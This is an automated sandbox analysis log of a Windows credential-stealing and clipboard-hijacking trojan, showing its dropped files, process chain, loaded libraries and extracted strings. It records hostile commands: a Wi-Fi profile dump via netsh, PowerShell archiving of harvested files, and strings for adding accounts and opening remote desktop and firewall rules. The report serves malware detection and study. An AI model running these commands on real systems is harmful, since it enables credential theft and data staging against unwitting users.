                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000E51A01_2_000E51A0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_001133101_2_00113310
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_001263C41_2_001263C4
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000E54501_2_000E5450
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_001264E41_2_001264E4
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0011D5591_2_0011D559
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_001247371_2_00124737
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010BBB01_2_0010BBB0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0010FDCB1_2_0010FDCB
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_0011CDCD1_2_0011CDCD
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000E4EF01_2_000E4EF0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000E51A02_2_000E51A0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000E61F02_2_000E61F0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_001133102_2_00113310
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_001263C42_2_001263C4
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000E54502_2_000E5450
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_001264E42_2_001264E4
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0011D5592_2_0011D559
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_001247372_2_00124737
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010BBB02_2_0010BBB0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0010FDCB2_2_0010FDCB
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_0011CDCD2_2_0011CDCD
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 2_2_000E4EF02_2_000E4EF0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B624DFB11_2_00007FFD9B624DFB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B6E773211_2_00007FFD9B6E7732
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C0531B012_2_6C0531B0
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_6C061AB112_2_6C061AB1
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll B91A3743C7399AEE454491862E015EF6FC668A25D1AA2816E065A86A03F6BE35
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll C7ED512058BC924045144DAA16701DA10F244AC12A5EA2DE901E59DCE6470839
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe EFF5FAD47B9C739B09E760813B2BCBB0788EB35598F72E64FF95C794E72E6676
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 000E61F0 appears 39 times
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 0010AC60 appears 111 times
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00112B28 appears 51 times
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00104640 appears 272 times
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 0010A414 appears 76 times
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00118B3C appears 34 times
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: String function: 00103730 appears 65 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6C0573B0 appears 34 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6C055D90 appears 103 times
                        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6C056B05 appears 47 times
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: String function: 0030AC60 appears 56 times
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeCode function: String function: 00304640 appears 136 times
                        Source: tOuVwTJrau.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@30/23@0/2
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeCode function: 1_2_000EE8D0 GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CoUninitialize,1_2_000EE8D0
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeFile created: C:\Users\user\AppData\Roaming\43266f2abbf198Jump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5724:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeMutant created: \Sessions\1\BaseNamedObjects\43266f2abbf198987ad62d4962cf7134
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile created: C:\Users\user\AppData\Local\Temp\ee29ea508bJump to behavior
                        Source: tOuVwTJrau.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: rundll32.exe, 00000004.00000002.2137636900.0000021E065DE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2138710552.0000025839577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: cred64.dll.1.dr, cred64[1].dll.1.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: tOuVwTJrau.exeVirustotal: Detection: 70%
                        Source: tOuVwTJrau.exeReversingLabs: Detection: 65%
                        Source: tOuVwTJrau.exeString found in binary or memory: " /add
                        Source: tOuVwTJrau.exeString found in binary or memory: " /add /y
                        Source: Gxtuum.exeString found in binary or memory: " /add /y
                        Source: Gxtuum.exeString found in binary or memory: " /add
                        Source: Gxtuum.exeString found in binary or memory: " /add /y
                        Source: Gxtuum.exeString found in binary or memory: " /add
                        Source: tOuVwTJrau.exeString found in binary or memory: " /add /y
                        Source: tOuVwTJrau.exeString found in binary or memory: " /add
                        Source: tOuVwTJrau.exeString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeFile read: C:\Users\user\Desktop\tOuVwTJrau.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\tOuVwTJrau.exe "C:\Users\user\Desktop\tOuVwTJrau.exe"
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, MainJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, MainJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, MainJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, MainJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, MainJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\tOuVwTJrau.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
                        Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
